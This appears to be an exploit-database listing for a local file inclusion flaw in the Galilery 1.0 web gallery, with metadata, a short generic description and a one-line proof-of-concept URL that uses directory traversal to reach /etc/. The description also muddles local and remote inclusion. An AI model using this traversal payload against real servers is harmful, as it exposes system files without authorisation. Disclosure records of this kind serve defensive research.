header-logo
Suggest Exploit
vendor:
Galilery
by:
lemlajt
9.3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Galilery
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE: N/A
CPE: o:galilery:galilery:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011

Local File Include in Galilery 1.0

Galilery 1.0 is vulnerable to a Local File Inclusion vulnerability. This vulnerability allows an attacker to include a file from a remote server, which can be used to execute malicious code on the vulnerable server. The vulnerability exists due to the fact that the application does not properly validate user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious file path.

Mitigation:

To mitigate this vulnerability, the application should validate user-supplied input and ensure that it does not contain any malicious code.
Source

Exploit-DB raw data:

$ cat 15_lfi_galilery.1.0.txt
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/


PoC :

http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/

cuz:
index.php: $d=$_GET['d'];

# *